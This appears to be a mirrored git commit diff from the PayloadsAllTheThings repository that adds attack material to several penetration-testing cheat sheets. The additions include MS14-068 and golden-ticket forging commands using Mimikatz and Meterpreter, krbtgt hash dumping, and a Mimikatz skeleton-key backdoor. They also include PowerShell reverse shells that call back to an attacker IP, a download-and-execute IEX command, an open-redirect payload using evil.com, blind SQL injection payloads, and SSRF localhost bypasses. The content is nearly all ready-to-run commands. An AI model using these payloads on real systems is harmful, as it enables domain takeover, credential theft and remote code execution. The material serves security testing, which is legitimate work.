mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
AD Attack - Golden Ticket + SQL/OpenRed/SSRF
This commit is contained in:
parent
354d94219e
commit
b8fbca3347
@ -6,6 +6,11 @@
|
||||
Exploit Python: https://www.exploit-db.com/exploits/35474/
|
||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
|
||||
|
||||
git clone https://github.com/bidord/pykek
|
||||
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
|
||||
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
|
||||
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||
```
|
||||
* MS17-010 (Eternal Blue - Local Admin)
|
||||
```c
|
||||
@ -41,8 +46,24 @@
|
||||
```
|
||||
* Golden Tickets
|
||||
```c
|
||||
mimikatz
|
||||
kerberos::ptc tgt.bin
|
||||
Get info - Mimikatz
|
||||
lsadump::dcsync /user:krbtgt
|
||||
lsadump::lsa /inject /name:krbtgt
|
||||
|
||||
Get info - Meterpreter(kiwi)
|
||||
dcsync_ntlm krbtgt
|
||||
|
||||
Forge a Golden ticket - Mimikatz
|
||||
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
||||
kerberos::tgt
|
||||
|
||||
Forge a Golden ticket - Metasploit
|
||||
post/windows/escalate/golden_ticket
|
||||
|
||||
Forge a Golden ticket - Meterpreter
|
||||
load kiwi
|
||||
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
||||
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
||||
```
|
||||
* Kerberoast
|
||||
```c
|
||||
@ -120,3 +141,4 @@ net group "Domain Admins" hacker2 /add /domain
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||
* [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)
|
||||
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
|
||||
* [Golden ticket](https://pentestlab.blog/2018/04/09/golden-ticket/)
|
||||
|
@ -72,6 +72,11 @@ Powershell
|
||||
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
|
||||
```powershell
|
||||
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
|
||||
```
|
||||
|
@ -22,6 +22,16 @@ Mimikatz Golden ticket
|
||||
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
|
||||
```
|
||||
|
||||
Mimikatz Skeleton key
|
||||
```
|
||||
privilege::debug
|
||||
misc::skeleton
|
||||
|
||||
# map the share
|
||||
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
|
||||
# login as someone
|
||||
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
||||
```
|
||||
|
||||
|
||||
## Mimikatz commands
|
||||
@ -62,3 +72,4 @@ More informations can be grabbed from the Memory with :
|
||||
|
||||
## Thanks to
|
||||
* [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
|
||||
* [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
|
||||
|
@ -10,6 +10,10 @@ WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELIS
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
Using a whitelisted domain or keyword
|
||||
```
|
||||
www.whitelisted.com.evil.com redirect to evil.com
|
||||
```
|
||||
|
||||
Using CRLF to bypass "javascript" blacklisted keyword
|
||||
```
|
||||
|
@ -78,3 +78,4 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||
## Thanks to
|
||||
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
||||
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
||||
|
@ -48,6 +48,21 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||
```
|
||||
|
||||
## MYSQL Blind using a conditional statement
|
||||
TRUE: `if @@version starts with a 5`:
|
||||
```
|
||||
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||
Response:
|
||||
HTTP/1.1 500 Internal Server Error
|
||||
```
|
||||
|
||||
False: `if @@version starts with a 4`:
|
||||
```
|
||||
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
```
|
||||
|
||||
## MYSQL Blind with MAKE_SET
|
||||
```
|
||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||
|
@ -4,27 +4,45 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t
|
||||
|
||||
## Entry point detection
|
||||
Detection of an SQL injection entry point
|
||||
Simple characters
|
||||
```
|
||||
'
|
||||
"
|
||||
%27
|
||||
" / %22
|
||||
; / %3B
|
||||
"
|
||||
%22
|
||||
#
|
||||
%23
|
||||
;
|
||||
%3B
|
||||
)
|
||||
Wildcard (*)
|
||||
```
|
||||
|
||||
Multiple encoding
|
||||
```
|
||||
%%2727
|
||||
%25%27
|
||||
```
|
||||
|
||||
Merging characters
|
||||
```
|
||||
`+HERP
|
||||
'||'DERP
|
||||
'+'herp
|
||||
' 'DERP
|
||||
'%20'HERP
|
||||
'%2B'HERP
|
||||
```
|
||||
|
||||
Weird characters
|
||||
```
|
||||
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
||||
transformed into U+0022 QUOTATION MARK (")
|
||||
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
||||
transformed into U+0027 APOSTROPHE (')
|
||||
Wildcard (*)
|
||||
```
|
||||
|
||||
|
||||
|
||||
## SQL injection using SQLmap
|
||||
Basic arguments for SQLmap
|
||||
```
|
||||
@ -329,6 +347,8 @@ mysql> mysql> select version();
|
||||
|
||||
|
||||
## Thanks to - Other resources
|
||||
* Detect SQLi
|
||||
- [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
|
||||
* MySQL:
|
||||
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
||||
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||
|
@ -61,6 +61,11 @@ Bypass localhost with a domain redirecting to locahost
|
||||
```
|
||||
http://localtest.me
|
||||
http://n-pn.info
|
||||
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
||||
```
|
||||
The service nip.io is awesome for that, it will convert any ip address as a dns.
|
||||
```
|
||||
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
|
||||
```
|
||||
|
||||
Bypass localhost with CIDR : 127.x.x.x
|
||||
|
Loading…
Reference in New Issue
Block a user